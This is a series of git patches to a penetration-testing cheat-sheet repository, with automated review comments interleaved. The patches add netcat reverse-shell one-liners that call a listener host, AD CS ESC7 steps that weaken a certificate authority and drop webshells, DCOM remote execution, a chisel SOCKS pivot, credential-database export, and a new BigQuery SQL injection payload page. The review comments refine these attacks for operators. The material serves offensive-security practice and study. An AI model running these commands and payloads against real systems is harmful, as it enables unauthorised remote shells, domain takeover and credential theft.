* [Awk](#awk)
* [Automatic Reverse Shell Generator](#revshells)
@@ -39,6 +40,10 @@
* [Spawn TTY Shell](#spawn-tty-shell)
* [References](#references)
+## Tools
+
+- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator))
+
## Reverse Shell
### Bash TCP
From a397a3d64300ac0cec27efc02e755d2116a36444 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sat, 22 Jan 2022 23:08:25 +0100
Subject: [PATCH 27/50] add revshellgen and merge to tools section
---
Methodology and Resources/Reverse Shell Cheatsheet.md | 9 ++-------
1 file changed, 2 insertions(+), 7 deletions(-)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index f276ddf..b1d5bae 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -42,7 +42,8 @@
## Tools
-- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator))
+- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) ![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png)
+- [revshellgen](https://github.com/t0thkr1s/revshellgen) - CLI Reverse Shell generator
## Reverse Shell
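Review bot: The hosted generator entry should carry a caveat: the payloads it builds embed the listener IP and port typed into a third-party website, which discloses engagement infrastructure to whoever runs or observes that site; since the source link is right there, add `- prefer self-hosting it (or the CLI revshellgen below) for real engagements` to the line. The screenshot carried over from the deleted RevShells section adds little to a tool list and could be dropped to keep the section compact.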
@@ -439,12 +440,6 @@ main() {
}
```
-## RevShells
-
-https://www.revshells.com/
-![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png)
-
-
## Meterpreter Shell
### Windows Staged reverse TCP
From 05a77e06fc74cc3c7cd3ab8fe3473bac29b43b0b Mon Sep 17 00:00:00 2001
From: clem9669 <18504086+clem9669@users.noreply.github.com>
Date: Wed, 26 Jan 2022 13:13:11 +0000
Subject: [PATCH 28/50] Update Active Directory Attack.md
Updating the scanner modules for PingCastle.exe
---
Methodology and Resources/Active Directory Attack.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 04f6c0a..6110263 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -175,7 +175,7 @@
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
- available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
+ available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users
```
* [Kerbrute](https://github.com/ropnop/kerbrute)
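Review bot: The list on the `available scanners are:` line is a snapshot of one PingCastle build and will go stale again (the previous one already had `ullsession`), so rather than maintaining it by hand the entry should also tell readers how to get the authoritative list from the binary they have, e.g. `# the installed build lists its own scanners via pingcastle.exe --help` — hedged, as I have not checked which option prints it. A space after `are:` would also stop the comma-separated names from rendering as one run-on token.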
From d7e357f53a30bbd7b4e4b89012f357bd787cfced Mon Sep 17 00:00:00 2001
From: Eslam Salem
Date: Sat, 29 Jan 2022 17:19:30 +0200
Subject: [PATCH 29/50] fix rm bug in netcat reverseshell on OpenBSD & BusyBox
---
Methodology and Resources/Reverse Shell Cheatsheet.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index b1d5bae..e1da152 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -208,13 +208,13 @@ nc -c bash 10.0.0.1 4242
### Netcat OpenBsd
```bash
-rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
+rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
```
### Netcat BusyBox
```bash
-rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
+rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
```
### Ncat
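Review bot: With `rm -f` the first-run error is gone, but both one-liners still use the fixed, predictable `/tmp/f`: on a host where another user already owns `/tmp/f` (sticky-bit /tmp) the `rm` fails, `mkfifo` fails, and `cat` then reads whatever that file is, and two operators running the same payload on one box collide. A per-invocation name avoids both, e.g. `f=$(mktemp -u);rm -f $f;mkfifo $f;cat $f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >$f`; `mktemp -u` is present in BusyBox as far as I know, but worth checking on the target first. The same applies to the `mknod ... p` variant.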
From 0b5c5acb8703c0cdfba2a698b65ef64144923777 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 30 Jan 2022 23:41:31 +0100
Subject: [PATCH 30/50] ESC7 - Vulnerable Certificate Authority Access Control
---
.../Active Directory Attack.md | 26 +++++++++++++++++++
SQL Injection/OracleSQL Injection.md | 2 ++
2 files changed, 28 insertions(+)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 6110263..c0c16fe 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -77,6 +77,7 @@
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
* [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
+ * [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@@ -2278,6 +2279,30 @@ Mitigation:
* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
+#### ESC7 - Vulnerable Certificate Authority Access Control
+
+Exploitation:
+* Detect CAs that allow low privileged users the ManageCA permission
+ ```ps1
+ Certify.exe find /vulnerable
+ ```
+* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
+ ```ps1
+ Certify.exe setconfig /enablesan /restart
+ ```
+* Request the certificate with the desired SAN.
+ ```ps1
+ Certify.exe request /template:User /altname:super.adm
+ ```
+* Grant approval if required or disable the approval requirement
+ ```ps1
+ # Grant
+ Certify.exe issue /id:[REQUEST ID]
+ # Disable
+ Certify.exe setconfig /removeapproval /restart
+ ```
+
+
#### ESC8 - AD CS Relay Attack
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
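Review bot: `Certify.exe setconfig /enablesan /restart` and `setconfig /removeapproval /restart` rewrite the CA's policy configuration and restart the certificate service, which is disruptive and leaves the CA weakened — the flag `/enablesan` sets is the ESC6 `EDITF_ATTRIBUTESUBJECTALTNAME2` flag that the mitigation line just above this hunk tells readers to remove — so the section should say so and point to the revert, e.g. `# Revert afterwards: certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2 and restore the approval requirement`. As far as I can tell from the linked BlackArrow post, the `setconfig` and `issue` verbs come from a modified Certify rather than upstream, which is worth noting next to the commands so readers know which build to use. If I remember the ESC7 write-up correctly, `Certify.exe issue` needs the Manage Certificates right, which a ManageCA holder first grants to themselves — one line on that step would close the gap between steps 3 and 4.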
@@ -3468,3 +3493,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
+* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
\ No newline at end of file
diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md
index 45c0d66..39535ed 100644
--- a/SQL Injection/OracleSQL Injection.md
+++ b/SQL Injection/OracleSQL Injection.md
@@ -79,6 +79,8 @@ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
## Oracle SQL Command execution
+* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
+
```sql
/* create Java class */
BEGIN
From d36f98b4ca560c7dcb9b63161af8ebd3fd78e227 Mon Sep 17 00:00:00 2001
From: brightio
Date: Mon, 31 Jan 2022 12:16:29 +0100
Subject: [PATCH 31/50] Update LinPEAS links
---
Methodology and Resources/Linux - Privilege Escalation.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index c0a39c0..2021fea 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md
+++ b/Methodology and Resources/Linux - Privilege Escalation.md
@@ -54,11 +54,11 @@
There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escelation vectors.
Here are a few:
-- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
```powershell
- wget "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -O linpeas.sh
- curl "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -o linpeas.sh
+ wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
+ curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh
./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users
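Review bot: `releases/latest/download/linpeas.sh` is a moving target, so the `wget`/`curl` lines now fetch and run whatever the newest release is, with no record of which version ran on a client host; for engagements it is better to pin a tag, `wget "https://github.com/carlospolop/PEASS-ng/releases/download/<tag>/linpeas.sh" -O linpeas.sh`, and note the file hash (`sha256sum linpeas.sh`) before executing it. That is a supply-chain hygiene point rather than a defect in the link change itself. The fence is still labelled `powershell` although these are shell commands; `bash` would render more honestly.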
From 71dcfd5ca765fe7d1397c62a733066c63bceed19 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 18 Feb 2022 14:50:38 +0100
Subject: [PATCH 32/50] ADCS ESC7 Shell + Big Query SQL
---
.../Active Directory Attack.md | 32 ++++++++-
.../Miscellaneous - Tricks.md | 10 +++
.../Network Pivoting Techniques.md | 7 +-
SQL Injection/BigQuery Injection.md | 70 +++++++++++++++++++
4 files changed, 114 insertions(+), 5 deletions(-)
create mode 100644 SQL Injection/BigQuery Injection.md
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c0c16fe..60637d8 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
```
-You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
+You can add some custom queries like :
+* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
+* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
+* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
+
+Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
### Using PowerView
@@ -2302,6 +2307,22 @@ Exploitation:
Certify.exe setconfig /removeapproval /restart
```
+Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
+
+```ps1
+# Get the current CDP list. Useful to find remote writable shares:
+Certify.exe writefile /ca:SERVER\ca-name /readonly
+
+# Write an aspx shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
+
+# Write the default asp shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
+
+# Write a php shell to a remote web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
+```
+
#### ESC8 - AD CS Relay Attack
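Review bot: The `Certify.exe writefile` examples drop a webshell as the CA service into the CES directory, the IIS webroot or a remote share, but nothing says what this does to the CA or what to clean up; as far as I follow the linked BlackArrow post the write is achieved by changing the CA's CRL distribution points, so the CDP entries need restoring and the dropped `shell.aspx`/`shell.asp`/`shell.php` files removing after use — a line such as `# Cleanup: restore the CDP list captured with /readonly and delete the written shells` would help. The placeholders `C:\Windows\SystemData\CES\CA-Name` and `/ca:SERVER\ca-name` in the same command use different casing for what should be the same CA name, which reads as two different values.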
@@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
-* Impacket DcomExec.py
+* Impacket DCOMExec.py
```ps1
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
dcomexec.py -share C$ -object MMC20 '/:@'
dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig'
+
+ python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
+ # -object MMC20 specifies that we wish to instantiate the MMC20.Application object.
+ # -silentcommand executes the command without attempting to retrieve the output.
```
* CheeseTools - https://github.com/klezVirus/CheeseTools
```powershell
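Review bot: The `$DOMAIN/$USER:$PASSWORD\$@$HOST` form passes the password on the command line, where it lands in shell history and is visible to other local users via `ps`; the surrounding examples already show `-hashes` and `-k`/`-no-pass`, so a note such as `# prefer -k (Kerberos) or -hashes over a password on the command line` would be consistent with them. The `\$@` escape is Bash quoting inside a fence labelled `ps1`, which will confuse readers who actually run it from PowerShell.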
@@ -3493,4 +3518,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
-* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
\ No newline at end of file
+* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
+* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md
index 1794178..e82618b 100644
--- a/Methodology and Resources/Miscellaneous - Tricks.md
+++ b/Methodology and Resources/Miscellaneous - Tricks.md
@@ -14,4 +14,14 @@ $ wall "Stop messing with the XXX service !"
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
$ who
$ write root pts/2 # press Ctrl+D after typing the message.
+```
+
+## CrackMapExec Credential Database
+
+```ps1
+cmedb (default) > workspace create test
+cmedb (test) > workspace default
+cmedb (test) > proto smb
+cmedb (test)(smb) > creds
+cmedb (test)(smb) > export creds csv /tmp/creds
```
\ No newline at end of file
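Review bot: `export creds csv /tmp/creds` writes every harvested credential into a directory readable by every local user, with the file created under the default umask, which on a shared jump box or CTF VM exposes client secrets; point the example at a restricted location, e.g. `cmedb (test)(smb) > export creds csv ~/loot/creds.csv  # keep it out of /tmp and remove it when done`. The section also starts straight at the `cmedb` prompt without saying what it is — a one-liner such as `cmedb is CrackMapExec's database shell; the default workspace holds the credentials CME collects during runs` would orient readers.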
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 68a6197..39e40aa 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -8,7 +8,7 @@
* [Local Port Forwarding](#local-port-forwarding)
* [Remote Port Forwarding](#remote-port-forwarding)
* [Proxychains](#proxychains)
-* [Graphtcp](#graphtcp)
+* [Graftcp](#graftcp)
* [Web SOCKS - reGeorg](#web-socks---regeorg)
* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
* [Metasploit](#metasploit)
@@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
go get -v github.com/jpillora/chisel
# forward port 389 and 88 to hacker computer
-user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
+
+# SOCKS
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks
```
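Review bot: The server side of this example is started with `--reverse` and no `--auth`, so once the new `R:socks` line is in place anyone who can reach port 8008 can register their own reverse forwards or a SOCKS proxy on the operator's machine. Chisel supports a shared secret via `--auth user:pass` on the server and the same value on the client (it can also come from the `AUTH` environment variable, if memory serves), so I would add it to both lines, e.g. `chisel server -p 8008 --reverse --auth user:pass` and `chisel.exe client --auth user:pass YOUR_IP:8008 R:socks`. It is also worth stating where the reverse SOCKS listener comes up on the server side (chisel defaults it to a local port, 1080 as far as I recall) so the reader knows what to point proxychains at.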
### SharpChisel
diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md
new file mode 100644
index 0000000..ed84975
--- /dev/null
+++ b/SQL Injection/BigQuery Injection.md
@@ -0,0 +1,70 @@
+# Google BigQuery SQL Injection
+
+## Summary
+
+* [Detection](#detection)
+* [BigQuery Comment](#bigquery-comment)
+* [BigQuery Union Based](#bigquery-union-based)
+* [BigQuery Error Based](#bigquery-error-based)
+* [BigQuery Boolean Based](#bigquery-boolean-based)
+* [BigQuery Time Based](#bigquery-time-based)
+* [References](#references)
+
+## Detection
+
+* Use a classic single quote to trigger an error: `'`
+* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
+
+```ps1
+# Gathering project id
+select @@project_id
+
+# Gathering all dataset names
+select schema_name from INFORMATION_SCHEMA.SCHEMATA
+
+# Gathering data from specific project id & dataset
+select * from `project_id.dataset_name.table_name`
+```
+
+## BigQuery Comment
+
+```ps1
+select 1#from here it is not working
+select 1/*between those it is not working*/
+```
+
+## BigQuery Union Based
+
+```ps1
+UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
+```
+
+## BigQuery Error Based
+
+```ps1
+# Error based - division by zero
+' OR if(1/(length((select('a')))-1)=1,true,false) OR '
+
+# Error based - casting: select CAST(@@project_id AS INT64)
+dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
+```
+
+## BigQuery Boolean Based
+
+```ps1
+' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
+```
+
+## BigQuery Time Based
+
+* Time based functions does not exist in the BigQuery syntax.
+
+## References
+
+* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
+* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
+* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
+* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
\ No newline at end of file
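Review bot: The "BigQuery Comment" section reads as if comments do not work at all (`#from here it is not working`), when the intent is that text after the marker is ignored; it also omits the `--` form, which BigQuery standard SQL accepts alongside `#` and `/* */`. I would reword the two lines as `select 1# everything after the hash is ignored` and `select 1/* inline comment, the rest of the statement still runs */` and add `select 1-- also ignored`. "Time based functions does not exist" should read "Time-based functions do not exist", and the fences are tagged `ps1` for what is SQL; `sql` would render correctly.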
From 3e3562e55332151baa8497c5bd6b7222ac9a0913 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 20 Feb 2022 13:15:28 +0100
Subject: [PATCH 33/50] ESC3 - Misconfigured Enrollment Agent Templates +
Certipy v2
---
.../Active Directory Attack.md | 107 ++++++++++++------
1 file changed, 71 insertions(+), 36 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 60637d8..4b118b5 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -75,9 +75,10 @@
- [Active Directory Certificate Services](#active-directory-certificate-services)
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
+ - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
- * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
- * [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
+ - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
+ - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@@ -210,41 +211,43 @@ Use the correct collector
* AzureHound for Azure Active Directory
* SharpHound for local Active Directory
-use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
+* use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
+ ```powershell
+ # require: Install-Module -name Az -AllowClobber
+ # require: Install-Module -name AzureADPreview -AllowClobber
+ Connect-AzureAD
+ Connect-AzAccount
+ . .\AzureHound.ps1
+ Invoke-AzureHound
+ ```
-```powershell
-# require: Install-Module -name Az -AllowClobber
-# require: Install-Module -name AzureADPreview -AllowClobber
-Connect-AzureAD
-Connect-AzAccount
-. .\AzureHound.ps1
-Invoke-AzureHound
-```
+* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
+ ```powershell
+ # run the collector on the machine using SharpHound.exe
+ # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
+ # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
+ .\SharpHound.exe -c all -d active.htb -SearchForest
+ .\SharpHound.exe --EncryptZip --ZipFilename export.zip
+ .\SharpHound.exe -c all,GPOLocalGroup
+ .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
+ .\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100
+ .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
-use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
+ # or run the collector on the machine using Powershell
+ # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
+ # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
+ Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
+ Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory
-```powershell
-# run the collector on the machine using SharpHound.exe
-# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
-# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
-.\SharpHound.exe -c all -d active.htb -SearchForest
-.\SharpHound.exe --EncryptZip --ZipFilename export.zip
-.\SharpHound.exe -c all,GPOLocalGroup
-.\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
-.\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100
-.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
-
-# or run the collector on the machine using Powershell
-# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
-Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
-Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory
-
-# or remotely via BloodHound Python
-# https://github.com/fox-it/BloodHound.py
-pip install bloodhound
-bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
-```
+ # or remotely via BloodHound Python
+ # https://github.com/fox-it/BloodHound.py
+ pip install bloodhound
+ bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
+ ```
+* Collect more data for certificates exploitation using Certipy
+ ```ps1
+ certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
+ ```
Then import the zip/json files into the Neo4J database and query them.
@@ -264,6 +267,7 @@ You can add some custom queries like :
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
+* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
